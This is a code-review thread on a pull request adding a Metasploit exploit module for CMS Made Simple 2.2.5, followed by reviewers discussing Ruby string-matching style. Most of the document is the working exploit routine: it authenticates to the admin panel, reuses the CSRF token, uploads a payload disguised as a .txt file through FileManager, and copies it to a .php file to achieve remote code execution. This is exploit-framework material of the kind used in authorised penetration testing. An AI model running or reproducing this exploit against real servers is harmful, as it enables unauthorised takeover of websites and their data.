modules/exploits/multi/http/cmsms_upload_rename_rce.rb

```diff
@@ -0,0 +1,161 @@
+      version = Gem::Version.new($1)
+      vprint_status("#{peer} - CMS Made Simple Version: #{version}")
+      vuln = Gem::Version.new('2.2.5')
+
+      if version == vuln
+        return Exploit::CheckCode::Appears
+      end
+    end
+
+    Exploit::CheckCode::Unknown
+  end
+
+  def exploit
+    unless check == Exploit::CheckCode::Appears
+      unless datastore['ForceExploit']
+        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
+      end
+      print_warning 'Target does not appear to be vulnerable'
+    end
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'admin', 'login.php'),
+      'method' => 'POST',
+      'vars_post' => {
+        'username' => datastore['USERNAME'],
+        'password' => datastore['PASSWORD'],
+        'loginsubmit' => 'Submit'
+      }
+    })
+    unless res
+      fail_with(Failure::NotFound, 'A response was not received from the remote host')
+    end
+
+    unless res.code == 302 && res.get_cookies && res.headers['Location'] =~ /\/admin\?(.*)?=(.*)/
+      fail_with(Failure::NoAccess, 'Authentication was unsuccessful')
+    end
+    vprint_good("#{peer} - Authentication successful")
+
+    csrf = {$1 => $2}
+    cookies = res.get_cookies
+    filename = rand_text_alpha(10)
+
+    # Generate form data
+    message = Rex::MIME::Message.new
+    message.add_part(csrf[$1], nil, nil, "form-data; name=\"#{$1}\"")
+    message.add_part('FileManager,m1_,upload,0', nil, nil, 'form-data; name="mact"')
+    message.add_part('1', nil, nil, 'form-data; name="disable_buffer"')
+    message.add_part(payload.encoded, nil, nil, "form-data; name=\"m1_files[]\"; filename=\"#{filename}.txt\"")
+    data = message.to_s
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'admin', 'moduleinterface.php'),
+      'method' => 'POST',
+      'data' => data,
+      'ctype' => "multipart/form-data; boundary=#{message.bound}",
+      'cookie' => cookies
+    })
+
+    unless res && res.code == 200
+      fail_with(Failure::UnexpectedReply, 'Failed to upload the text file')
+    end
+    vprint_good("#{peer} - File uploaded #{filename}.txt")
+
+    fileb64 = Rex::Text.encode_base64("#{filename}.txt")
+    data = {
+      'mact' => 'FileManager,m1_,fileaction,0',
+      "m1_fileactioncopy" => "",
+      'm1_selall' => "a:1:{i:0;s:#{fileb64.length}:\"#{fileb64}\";}",
+      'm1_destdir' => '/',
+      'm1_destname' => "#{filename}.php",
+      'm1_path' => '/uploads',
+      'm1_submit' => 'Copy',
+      $1 => $2
+    }
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'admin', 'moduleinterface.php'),
+      'method' => 'POST',
+      'cookie' => cookies,
+      'vars_post' => data
+    })
+
+    unless res
+      fail_with(Failure::NotFound, 'A reponse was not received from the remote host')
+    end
+
+    unless res.code == 302 && res.headers['Location'] =~ /copysuccess/
```

Comment:
`.include?('copysuccess')` is preferred.

Reply:
So just curious, why is `#include?` preferred over `=~`?

So I know `#include?` can be used for performance reasons, but `=~` is safer on `nil`. What's your reasoning behind that? Thanks.

Reply:
`=~` won't throw an error if `res.headers['Location']` is `nil`.
Although if the status code is 302 then the Location header should be present...

Reply:
* It's faster.
* If you're performing operations on `nil`, you're doing it wrong.
* If you solve a problem with a regex [unnecessarily], you now have two problems.

Reply:
Not an overly convincing argument, I know. The ruby style guide doesn't give preference one way or another. I err on the side of don't use a regex if you don't need to use a regex.

Reply:
`to_s.include?` is safe if you want to do that instead.

Reply:
I'm also a fan of `start_with?` and `end_with?` for "anchored" string comparisons.